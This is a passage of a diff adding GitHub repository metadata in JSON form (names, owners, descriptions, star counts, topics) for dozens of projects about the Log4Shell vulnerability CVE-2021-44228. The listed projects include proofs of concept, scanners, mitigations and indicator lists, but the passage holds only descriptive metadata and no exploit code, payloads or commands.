log4j RCE from CVE-2021-44228.", + "fork": false, + "created_at": "2021-12-12T01:24:51Z", + "updated_at": "2024-11-28T11:13:56Z", + "pushed_at": "2022-10-24T02:25:53Z", + "stargazers_count": 493, + "watchers_count": 493, + "has_discussions": false, + "forks_count": 72, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 72, + "watchers": 493, + "score": 0, + "subscribers_count": 25 + }, + { + "id": 437438829, + "name": "python-log4rce", + "full_name": "alexandre-lavoie\/python-log4rce", + "owner": { + "login": "alexandre-lavoie", + "id": 36684879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36684879?v=4", + "html_url": "https:\/\/github.com\/alexandre-lavoie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexandre-lavoie\/python-log4rce", + "description": "An All-In-One Pure Python PoC for CVE-2021-44228", + "fork": false, + "created_at": "2021-12-12T02:57:49Z", + "updated_at": "2024-11-25T23:28:13Z", + "pushed_at": "2021-12-16T18:34:46Z", + "stargazers_count": 175, + "watchers_count": 175, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cli", + "cve-2021-44228", + "log4j", + "python", + "rce" + ], + "visibility": "public", + "forks": 30, + "watchers": 175, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 437439106, + "name": "Log4Shell_CVE-2021-44228_related_attacks_IOCs", + "full_name": "RedDrip7\/Log4Shell_CVE-2021-44228_related_attacks_IOCs", + "owner": { + "login": "RedDrip7", + "id": 51360411, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51360411?v=4", + "html_url": "https:\/\/github.com\/RedDrip7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RedDrip7\/Log4Shell_CVE-2021-44228_related_attacks_IOCs", + "description": null, + "fork": false, + "created_at": "2021-12-12T02:59:54Z", + "updated_at": "2024-10-15T07:30:11Z", + "pushed_at": "2021-12-15T10:19:51Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 45, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 437440782, + "name": "CVE-2021-44228-Demo", + "full_name": "mzlogin\/CVE-2021-44228-Demo", + "owner": { + "login": "mzlogin", + "id": 1646590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1646590?v=4", + "html_url": "https:\/\/github.com\/mzlogin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mzlogin\/CVE-2021-44228-Demo", + "description": "Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP", + "fork": false, + "created_at": "2021-12-12T03:11:14Z", + "updated_at": "2024-08-12T20:18:49Z", + "pushed_at": "2021-12-12T03:22:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "jndi", + "ldap", + "rmi" + ], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437451451, + "name": "vcenter-log4j", + "full_name": "blake-fm\/vcenter-log4j", + "owner": { + "login": "blake-fm", + "id": 89286531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89286531?v=4", + "html_url": "https:\/\/github.com\/blake-fm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blake-fm\/vcenter-log4j", + "description": "Script to apply official workaround for VMware vCenter log4j vulnerability CVE-2021-44228", + "fork": false, + "created_at": "2021-12-12T04:23:10Z", + "updated_at": "2022-08-17T05:28:16Z", + "pushed_at": "2021-12-15T12:17:19Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437479258, + "name": "CVE-2021-44228-Apache-Log4j-Rce__review", + "full_name": "creamIcec\/CVE-2021-44228-Apache-Log4j-Rce__review", + "owner": { + "login": "creamIcec", + "id": 42510470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42510470?v=4", + "html_url": "https:\/\/github.com\/creamIcec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/creamIcec\/CVE-2021-44228-Apache-Log4j-Rce__review", + "description": "log4j2漏洞复现", + "fork": false, + "created_at": "2021-12-12T07:20:03Z", + "updated_at": "2021-12-12T07:20:03Z", + "pushed_at": "2021-12-12T07:20:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437501121, + "name": "cve-2021-44228-helpers", + "full_name": "uint0\/cve-2021-44228-helpers", + "owner": { + "login": "uint0", + "id": 11325389, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11325389?v=4", + "html_url": "https:\/\/github.com\/uint0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uint0\/cve-2021-44228-helpers", + "description": null, + "fork": false, + "created_at": "2021-12-12T09:21:09Z", + "updated_at": "2021-12-13T00:01:22Z", + "pushed_at": "2021-12-13T00:01:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437511755, + "name": "apache-log4j-poc", + "full_name": "RK800-DEV\/apache-log4j-poc", + "owner": { + "login": "RK800-DEV", + "id": 85429713, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85429713?v=4", + "html_url": "https:\/\/github.com\/RK800-DEV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RK800-DEV\/apache-log4j-poc", + "description": "CVE-2021-44228(Apache Log4j Remote Code Execution)", + "fork": false, + "created_at": "2021-12-12T10:17:13Z", + "updated_at": "2021-12-12T10:17:47Z", + "pushed_at": "2021-12-12T10:17:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437512798, + "name": "log4j-CVE-2021-44228", + "full_name": "sud0x00\/log4j-CVE-2021-44228", + "owner": { + "login": "sud0x00", + "id": 91898207, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91898207?v=4", + "html_url": "https:\/\/github.com\/sud0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sud0x00\/log4j-CVE-2021-44228", + "description": "CVE-2021-44228", + "fork": false, + "created_at": "2021-12-12T10:22:45Z", + "updated_at": "2023-11-07T01:40:01Z", + "pushed_at": "2021-12-12T14:08:08Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-44228", + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437518939, + "name": "CVE-2021-44228-docker-example", + "full_name": "DiCanio\/CVE-2021-44228-docker-example", + "owner": { + "login": "DiCanio", + "id": 6052859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6052859?v=4", + "html_url": "https:\/\/github.com\/DiCanio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DiCanio\/CVE-2021-44228-docker-example", + "description": null, + "fork": false, + "created_at": "2021-12-12T10:53:15Z", + "updated_at": "2021-12-13T03:58:51Z", + "pushed_at": "2021-12-13T00:03:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437525008, + "name": "cve-2021-44228-minecraft-poc", + "full_name": "myyxl\/cve-2021-44228-minecraft-poc", + "owner": { + "login": "myyxl", + "id": 22593897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22593897?v=4", + "html_url": "https:\/\/github.com\/myyxl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/myyxl\/cve-2021-44228-minecraft-poc", + "description": "Log4J CVE-2021-44228 Minecraft PoC", + "fork": false, + "created_at": "2021-12-12T11:22:51Z", + "updated_at": "2022-02-15T06:41:00Z", + "pushed_at": "2021-12-12T11:34:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j", + "log4shell", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437525445, + "name": "Awesome-CVE-2021-44228", + "full_name": "RrUZi\/Awesome-CVE-2021-44228", + "owner": { + "login": "RrUZi", + "id": 43235635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43235635?v=4", + "html_url": "https:\/\/github.com\/RrUZi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RrUZi\/Awesome-CVE-2021-44228", + "description": "An awesome curated list of repos for CVE-2021-44228. ``Apache Log4j 2``", + "fork": false, + "created_at": "2021-12-12T11:25:00Z", + "updated_at": "2021-12-12T11:35:58Z", + "pushed_at": "2021-12-12T11:33:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j2" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437525803, + "name": "CVE-2021-44228", + "full_name": "future-client\/CVE-2021-44228", + "owner": { + "login": "future-client", + "id": 122487775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122487775?v=4", + "html_url": "https:\/\/github.com\/future-client", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/future-client\/CVE-2021-44228", + "description": "Abuse Log4J CVE-2021-44228 to patch CVE-2021-44228 in vulnerable Minecraft game sessions to prevent exploitation in the session :) ", + "fork": false, + "created_at": "2021-12-12T11:26:42Z", + "updated_at": "2024-06-06T12:50:41Z", + "pushed_at": "2021-12-12T17:37:11Z", + "stargazers_count": 67, + "watchers_count": 67, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "exploit", + "jndi", + "ldap", + "log4j", + "minecraft", + "rce" + ], + "visibility": "public", + "forks": 3, + "watchers": 67, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437526168, + "name": "Log4JShell-Bytecode-Detector", + "full_name": "CodeShield-Security\/Log4JShell-Bytecode-Detector", + "owner": { + "login": "CodeShield-Security", + "id": 60257643, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60257643?v=4", + "html_url": "https:\/\/github.com\/CodeShield-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CodeShield-Security\/Log4JShell-Bytecode-Detector", + "description": "Local Bytecode Scanner for the Log4JShell Vulnerability (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-12T11:28:34Z", + "updated_at": "2023-05-10T20:58:01Z", + "pushed_at": "2022-02-23T19:10:53Z", + "stargazers_count": 50, + "watchers_count": 50, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bytecode", + "cve-2021-44228", + "log4j2", + "log4jshell", + "log4shell", + "scanner", + "security" + ], + "visibility": "public", + "forks": 9, + "watchers": 50, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 437526871, + "name": "log4j-poc", + "full_name": "Crane-Mocker\/log4j-poc", + "owner": { + "login": "Crane-Mocker", + "id": 46662246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46662246?v=4", + "html_url": "https:\/\/github.com\/Crane-Mocker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Crane-Mocker\/log4j-poc", + "description": "Poc of log4j2 (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-12T11:31:45Z", + "updated_at": "2023-01-27T21:00:19Z", + "pushed_at": "2021-12-12T12:19:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437536404, + "name": "divd-2021-00038--log4j-scanner", + "full_name": "dtact\/divd-2021-00038--log4j-scanner", + "owner": { + "login": "dtact", + "id": 65305480, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65305480?v=4", + "html_url": "https:\/\/github.com\/dtact", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dtact\/divd-2021-00038--log4j-scanner", + "description": "Scan systems and docker images for potential log4j vulnerabilities. Able to patch (remove JndiLookup.class) from layered archives. Will detect in-depth (layered archives jar\/zip\/tar\/war and scans for vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105). Binaries for Windows, Linux and OsX, but can be build on each platform supported by supported Golang.", + "fork": false, + "created_at": "2021-12-12T12:16:07Z", + "updated_at": "2023-08-09T21:34:19Z", + "pushed_at": "2021-12-28T22:21:52Z", + "stargazers_count": 50, + "watchers_count": 50, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 50, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 437538957, + "name": "CVE-2021-44228-log4Shell", + "full_name": "kali-dass\/CVE-2021-44228-log4Shell", + "owner": { + "login": "kali-dass", + "id": 28717904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28717904?v=4", + "html_url": "https:\/\/github.com\/kali-dass", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kali-dass\/CVE-2021-44228-log4Shell", + "description": "Sample log4j shell exploit", + "fork": false, + "created_at": "2021-12-12T12:27:39Z", + "updated_at": "2022-09-07T20:25:29Z", + "pushed_at": "2021-12-13T16:37:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437546559, + "name": "log4j2-CVE-2021-44228", + "full_name": "pravin-pp\/log4j2-CVE-2021-44228", + "owner": { + "login": "pravin-pp", + "id": 12995541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12995541?v=4", + "html_url": "https:\/\/github.com\/pravin-pp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pravin-pp\/log4j2-CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-12T13:00:38Z", + "updated_at": "2021-12-13T04:00:49Z", + "pushed_at": "2021-12-12T13:25:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437550473, + "name": "Exploitation-of-Log4j2-CVE-2021-44228", + "full_name": "Malwar3Ninja\/Exploitation-of-Log4j2-CVE-2021-44228", + "owner": { + "login": "Malwar3Ninja", + "id": 34618086, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34618086?v=4", + "html_url": "https:\/\/github.com\/Malwar3Ninja", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwar3Ninja\/Exploitation-of-Log4j2-CVE-2021-44228", + "description": "IP addresses exploiting recent log4j2 vulnerability CVE-2021-44228 ", + "fork": false, + "created_at": "2021-12-12T13:17:18Z", + "updated_at": "2024-08-04T16:04:11Z", + "pushed_at": "2021-12-19T12:42:02Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437551037, + "name": "docker-log4shell", + "full_name": "urholaukkarinen\/docker-log4shell", + "owner": { + "login": "urholaukkarinen", + "id": 5576504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5576504?v=4", + "html_url": "https:\/\/github.com\/urholaukkarinen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/urholaukkarinen\/docker-log4shell", + "description": "Dockerized Go app for testing the CVE-2021-44228 vulnerability", + "fork": false, + "created_at": "2021-12-12T13:19:50Z", + "updated_at": "2021-12-12T13:23:50Z", + "pushed_at": "2021-12-12T13:21:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437553138, + "name": "scan4log4j", + "full_name": "ssl\/scan4log4j", + "owner": { + "login": "ssl", + "id": 25695071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25695071?v=4", + "html_url": "https:\/\/github.com\/ssl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ssl\/scan4log4j", + "description": "Python script that sends CVE-2021-44228 log4j payload requests to url list", + "fork": false, + "created_at": "2021-12-12T13:28:31Z", + "updated_at": "2024-09-28T10:29:18Z", + "pushed_at": "2021-12-12T13:39:45Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437557116, + "name": "nginx-mitigate-log4shell", + "full_name": "infiniroot\/nginx-mitigate-log4shell", + "owner": { + "login": "infiniroot", + "id": 29702565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29702565?v=4", + "html_url": "https:\/\/github.com\/infiniroot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/infiniroot\/nginx-mitigate-log4shell", + "description": "Mitigate log4shell (CVE-2021-44228) vulnerability attacks using Nginx LUA script", + "fork": false, + "created_at": "2021-12-12T13:45:08Z", + "updated_at": "2024-05-10T08:52:50Z", + "pushed_at": "2021-12-15T08:14:56Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4shell", + "lua", + "mitigation", + "nginx", + "vulnerability" + ], + "visibility": "public", + "forks": 6, + "watchers": 38, + "score": 0, + "subscribers_count": 15 + }, + { + "id": 437560690, + "name": "log4j-cve-2021-44228", + "full_name": "lohanichaten\/log4j-cve-2021-44228", + "owner": { + "login": "lohanichaten", + "id": 70852336, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70852336?v=4", + "html_url": "https:\/\/github.com\/lohanichaten", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lohanichaten\/log4j-cve-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-12T13:59:38Z", + "updated_at": "2021-12-12T14:03:46Z", + "pushed_at": "2021-12-12T14:03:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437562080, + "name": "log4j-log4shell-affected", + "full_name": "authomize\/log4j-log4shell-affected", + "owner": { + "login": "authomize", + "id": 57180096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57180096?v=4", + "html_url": "https:\/\/github.com\/authomize", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/authomize\/log4j-log4shell-affected", + "description": "Lists of affected components and affected apps\/vendors by CVE-2021-44228 (aka Log4shell or Log4j RCE). This list is meant as a resource for security responders to be able to find and address the vulnerability ", + "fork": false, + "created_at": "2021-12-12T14:05:05Z", + "updated_at": "2024-08-19T11:32:50Z", + "pushed_at": "2021-12-19T07:40:25Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j", + "log4j-rce" + ], + "visibility": "public", + "forks": 8, + "watchers": 54, + "score": 0, + "subscribers_count": 22 + }, + { + "id": 437567489, + "name": "CVE-2021-44228_IoCs", + "full_name": "guardicode\/CVE-2021-44228_IoCs", + "owner": { + "login": "guardicode", + "id": 64462782, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64462782?v=4", + "html_url": "https:\/\/github.com\/guardicode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guardicode\/CVE-2021-44228_IoCs", + "description": "Known IoCs for log4j framework vulnerability ", + "fork": false, + "created_at": "2021-12-12T14:27:28Z", + "updated_at": "2022-01-02T08:53:49Z", + "pushed_at": "2022-01-18T13:34:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 437574258, + "name": "log4j-poc", + "full_name": "fireflyingup\/log4j-poc", + "owner": { + "login": "fireflyingup", + "id": 48504204, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48504204?v=4", + "html_url": "https:\/\/github.com\/fireflyingup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fireflyingup\/log4j-poc", + "description": "CVE-2021-44228 test demo", + "fork": false, + "created_at": "2021-12-12T14:54:25Z", + "updated_at": "2021-12-13T05:10:53Z", + "pushed_at": "2021-12-13T05:10:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437575607, + "name": "cve-2021-44228-qingteng-patch", + "full_name": "qingtengyun\/cve-2021-44228-qingteng-patch", + "owner": { + "login": "qingtengyun", + "id": 18526503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18526503?v=4", + "html_url": "https:\/\/github.com\/qingtengyun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qingtengyun\/cve-2021-44228-qingteng-patch", + "description": null, + "fork": false, + "created_at": "2021-12-12T15:00:04Z", + "updated_at": "2023-01-10T03:23:19Z", + "pushed_at": "2021-12-12T16:03:21Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437582859, + "name": "log4j-jndi-be-gone", + "full_name": "nccgroup\/log4j-jndi-be-gone", + "owner": { + "login": "nccgroup", + "id": 4067082, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4067082?v=4", + "html_url": "https:\/\/github.com\/nccgroup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nccgroup\/log4j-jndi-be-gone", + "description": "A Byte Buddy Java agent-based fix for CVE-2021-44228, the log4j 2.x \"JNDI LDAP\" vulnerability.", + "fork": false, + "created_at": "2021-12-12T15:29:20Z", + "updated_at": "2023-11-03T08:18:38Z", + "pushed_at": "2022-01-04T02:03:58Z", + "stargazers_count": 71, + "watchers_count": 71, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 71, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 437583301, + "name": "cve-2021-44228-qingteng-online-patch", + "full_name": "qingtengyun\/cve-2021-44228-qingteng-online-patch", + "owner": { + "login": "qingtengyun", + "id": 18526503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18526503?v=4", + "html_url": "https:\/\/github.com\/qingtengyun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qingtengyun\/cve-2021-44228-qingteng-online-patch", + "description": "Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.", + "fork": false, + "created_at": "2021-12-12T15:30:55Z", + "updated_at": "2022-11-09T18:14:43Z", + "pushed_at": "2022-01-19T09:07:14Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "log4j", + "log4jshell" + ], + "visibility": "public", + "forks": 4, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437586734, + "name": "horrors-log4shell", + "full_name": "tasooshi\/horrors-log4shell", + "owner": { + "login": "tasooshi", + "id": 44586478, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44586478?v=4", + "html_url": "https:\/\/github.com\/tasooshi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tasooshi\/horrors-log4shell", + "description": "A micro lab for CVE-2021-44228 (log4j)", + "fork": false, + "created_at": "2021-12-12T15:44:49Z", + "updated_at": "2022-03-15T19:14:39Z", + "pushed_at": "2022-02-22T00:27:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j", + "log4shell" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437602257, + "name": "evil-rmi-server", + "full_name": "Hydragyrum\/evil-rmi-server", + "owner": { + "login": "Hydragyrum", + "id": 4928181, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4928181?v=4", + "html_url": "https:\/\/github.com\/Hydragyrum", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hydragyrum\/evil-rmi-server", + "description": "An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228", + "fork": false, + "created_at": "2021-12-12T16:49:45Z", + "updated_at": "2024-08-12T20:18:50Z", + "pushed_at": "2021-12-12T21:48:06Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437603411, + "name": "spring-boot-log4j-cve-2021-44228-docker-lab", + "full_name": "twseptian\/spring-boot-log4j-cve-2021-44228-docker-lab", + "owner": { + "login": "twseptian", + "id": 9025301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4", + "html_url": "https:\/\/github.com\/twseptian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twseptian\/spring-boot-log4j-cve-2021-44228-docker-lab", + "description": "Spring Boot Log4j - CVE-2021-44228 Docker Lab ", + "fork": false, + "created_at": "2021-12-12T16:54:33Z", + "updated_at": "2024-08-14T04:42:20Z", + "pushed_at": "2021-12-17T13:59:44Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j", + "spring-boot-log4j" + ], + "visibility": "public", + "forks": 20, + "watchers": 25, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437630669, + "name": "log4jcheck", + "full_name": "OlafHaalstra\/log4jcheck", + "owner": { + "login": "OlafHaalstra", + "id": 6420723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6420723?v=4", + "html_url": "https:\/\/github.com\/OlafHaalstra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OlafHaalstra\/log4jcheck", + "description": "Check list of URLs against Log4j vulnerability CVE-2021-44228", + "fork": false, + "created_at": "2021-12-12T18:57:05Z", + "updated_at": "2023-06-25T13:56:28Z", + "pushed_at": "2021-12-20T17:32:06Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437649883, + "name": "Prove-CVE-2021-44228", + "full_name": "Panyaprach\/Prove-CVE-2021-44228", + "owner": { + "login": "Panyaprach", + "id": 9110880, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9110880?v=4", + "html_url": "https:\/\/github.com\/Panyaprach", + "user_view_type": "public" + }, + "html_url": 